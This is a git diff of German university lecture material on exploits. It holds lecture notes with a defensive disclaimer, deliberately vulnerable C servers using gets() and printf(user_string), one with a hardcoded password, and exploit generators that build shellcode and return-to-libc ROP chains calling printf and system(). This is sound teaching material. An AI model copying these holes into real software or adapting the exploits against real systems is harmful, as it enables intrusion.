diff --git a/20170707/test.txt b/20170707/test.txt
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/20170714/bs-20170714.txt b/20170714/bs-20170714.txt
new file mode 100644
index 0000000000000000000000000000000000000000..a64cf82076c9885a9bdd726855e52f4871f36a02
--- /dev/null
+++ b/20170714/bs-20170714.txt
@@ -0,0 +1,58 @@
+Exploits, 14.07.2017
+~~~~~~~~~~~~~~~~~~~~
+Vorab:
+
+ Dies ist keine Einladung, anderer Leute Systeme anzugreifen.
+ Derartige Handlungen sind Straftaten.
+
+ Ich erzähle Ihnen dies, damit Sie wissen,
+ wie Sie sich gegen derartige Angriffe verteidigen können.
+
+ Um es gleich vorwegzunehmen:
+ Gewöhnen Sie sich von vorneherein an,
+ sauber und ordentlich zu programmieren.
+
+Anleitungen für Exploits:
+http://www.computersecuritystudent.com/SECURITY_TOOLS/BUFFER_OVERFLOW/WINDOWS_APPS/lesson1/index.html
+http://www.thesprawl.org/research/exploit-exercises-protostar-stack/
+
+Literatur:
+Jon Erickson: Hacking: The Art of Exploitation.
+No Starch Press, 2003. ISBN: 1-59327-007-0
+
+Anleitung für den GNU-Debugger (gdb):
+http://beej.us/guide/bggdb/
+
+Formatstring-Angriff:
+
+ printf (user_string) für Exploit nutzen: %016llx
+ Server, der Passwort auf dem Stack speichert --> server-0.c
+
+ $ ./server-0
+ Your name, please: %016llx %016llx %016llx %016llx %016llx %016llx %016llx %016llx
+ Hello, 00000000004007c7 00007fdb2ced2df0 00000000004007c7 00007fdb2d0f3007
+ 20786c6c36313025 6373316870216948 00007fdb2cbd0068 0000007265746570!
+ ~~~~~~~~~~~~~~~~ ~~~~
+ Your password, please:
+
+SQL Injection: http://xkcd.com/327/
+
+Noch blöder: Java-Browser-Applet enthält Passwörter im Klartext:
+http://heise.de/-2812713
+
+Buffer Overflow für Exploit nutzen: server-[123].c, exploit-*
+
+Warum Absturz? Rücksprungadresse wird überschrieben. Blick auf den Stack.
+Funktionsaufruf: Register setzen, Funktion anspringen.
+Exploit: Rücksprungadresse gezielt überschreiben.
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
+
+Exploits: aktuelle Sicherheitslücke, 28.12.2016, 13:46:05
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Lücke in PHPMailer erlaubt die Ausführung fremden Codes
+https://heise.de/-3582072
diff --git a/20170714/exploit-1.c b/20170714/exploit-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..8152a6be038087a2757dfb9f520118124b1c52a0
--- /dev/null
+++ b/20170714/exploit-1.c
@@ -0,0 +1,14 @@
+#include <unistd.h>
+
+int main (int argc, char **argv)
+{
+ for (int i = 2; i < 50; i++)
+ write (1, "\x90", 1); // nop
+ write (1, "\x48\x83\xec\x60", 4); // sub $0x60,%rsp
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-1.txt b/20170714/exploit-1.txt
new file mode 100644
index 0000000000000000000000000000000000000000..085a561a1367caf24c2cc3c602309ed3281e3162
Binary files /dev/null and b/20170714/exploit-1.txt differ
diff --git a/20170714/exploit-1a.c b/20170714/exploit-1a.c
new file mode 100644
index 0000000000000000000000000000000000000000..7ecbb0945c486c045c4677f9a29a97fc998f79f8
--- /dev/null
+++ b/20170714/exploit-1a.c
@@ -0,0 +1,17 @@
+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+ uint64_t return_address = 0x7fffffffdfc0;
+ for (int i = 2; i < 42; i++)
+ write (1, "\x90", 1); // nop
+ write (1, &return_address, 8);
+ write (1, "\x48\x83\xec\x60", 4); // sub $0x60,%rsp
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-1a.txt b/20170714/exploit-1a.txt
new file mode 100644
index 0000000000000000000000000000000000000000..1a76575333d6cd9d5d6e632f860f435a71a67bf8
Binary files /dev/null and b/20170714/exploit-1a.txt differ
diff --git a/20170714/exploit-2.c b/20170714/exploit-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..d1ac24e9cd658ca1bed90902129ecd363a6c7dca
--- /dev/null
+++ b/20170714/exploit-2.c
@@ -0,0 +1,26 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555554791;
+ uint64_t add_offset_to_edi = 0x555555554798;
+ uint64_t dummy = 0;
+ uint64_t printf_address = 0x7ffff7a8a160;
+ uint64_t exit_address = 0x7ffff7a70950;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "I 0WN U!!1! "
+ " ";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_edi, 8);
+ write (1, &printf_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-2.txt b/20170714/exploit-2.txt
new file mode 100644
index 0000000000000000000000000000000000000000..96b05454ae0f416708a6a0b9b10b0cf797f22b6a
Binary files /dev/null and b/20170714/exploit-2.txt differ
diff --git a/20170714/exploit-3.c b/20170714/exploit-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..78df8b1c021feccf689641ba65b9555a7c6615dd
--- /dev/null
+++ b/20170714/exploit-3.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555554791;
+ uint64_t add_offset_to_edi = 0x555555554798;
+ uint64_t dummy = 0;
+ uint64_t system_address = 0x7ffff7a7a450;
+ uint64_t exit_address = 0x7ffff7a70950;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_edi, 8);
+ write (1, &system_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20170714/exploit-3.txt b/20170714/exploit-3.txt
new file mode 100644
index 0000000000000000000000000000000000000000..b08f8923fab1ad54ff81da72bd44cffd3d045d94
Binary files /dev/null and b/20170714/exploit-3.txt differ
diff --git a/20170714/peter.txt b/20170714/peter.txt
new file mode 100644
index 0000000000000000000000000000000000000000..9e4e7a981b8cd4928e8f14ea1e252e4b4c71b8b8
--- /dev/null
+++ b/20170714/peter.txt
@@ -0,0 +1 @@
+peter
diff --git a/20170714/photo-20161219-162640.jpg b/20170714/photo-20161219-162640.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..5387108f6aa5f77251cf6c981d71e6b77dbb9468
Binary files /dev/null and b/20170714/photo-20161219-162640.jpg differ
diff --git a/20170714/photo-20170102-130102.jpg b/20170714/photo-20170102-130102.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..92c6ab059d2e58e7d3c43f5ba7c6377be3d38645
Binary files /dev/null and b/20170714/photo-20170102-130102.jpg differ
diff --git a/20170714/server-0.c b/20170714/server-0.c
new file mode 100644
index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127
--- /dev/null
+++ b/20170714/server-0.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+ char name_buffer[100];
+ char *pass_buffer;
+ char username[] = "peter";
+ char password[] = "Hi!ph1sch";
+
+ printf ("Your name, please: ");
+ gets (name_buffer);
+ printf ("Hello, ");
+ printf (name_buffer);
+ printf ("!\n");
+
+ pass_buffer = getpass ("Your password, please: ");
+ if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+ printf ("You have access.\n");
+ else
+ printf ("Login incorrect.\n");
+ return 0;
+}
diff --git a/20170714/server-1.c b/20170714/server-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d
--- /dev/null
+++ b/20170714/server-1.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20170714/server-2.c b/20170714/server-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895
--- /dev/null
+++ b/20170714/server-2.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20170714/server-3.c b/20170714/server-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66
--- /dev/null
+++ b/20170714/server-3.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ fgets (buffer, 20, stdin);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20170714/test-asm.c b/20170714/test-asm.c
new file mode 100644
index 0000000000000000000000000000000000000000..33197ee6c2ec26004a3768605816ad76a4da275a
--- /dev/null
+++ b/20170714/test-asm.c
@@ -0,0 +1,11 @@
+int main (void)
+{
+ char msg[] = "I 0WN U!!1! "
+ " ";
+ asm ("sub $96, %rsp");
+ asm ("mov %rsp, %rdi");
+ asm ("mov $0, %eax");
+ asm ("call printf");
+ asm ("add $96, %rsp");
+ return 0;
+}
diff --git a/20170714/test-c.c b/20170714/test-c.c
new file mode 100644
index 0000000000000000000000000000000000000000..6c28d494dd66ead8c843b9cc7bf04dd4562774f1
--- /dev/null
+++ b/20170714/test-c.c
@@ -0,0 +1,9 @@
+#include <stdio.h>
+
+int main (void)
+{
+ char msg[] = "I 0WN U!!1! "
+ " ";
+ printf (msg);
+ return 0;
+}
diff --git a/common/os-layers.xcf.gz b/common/os-layers.xcf.gz
new file mode 100644
index 0000000000000000000000000000000000000000..33b9c21bb687417dc59909158c89455d386e2d8e
Binary files /dev/null and b/common/os-layers.xcf.gz differ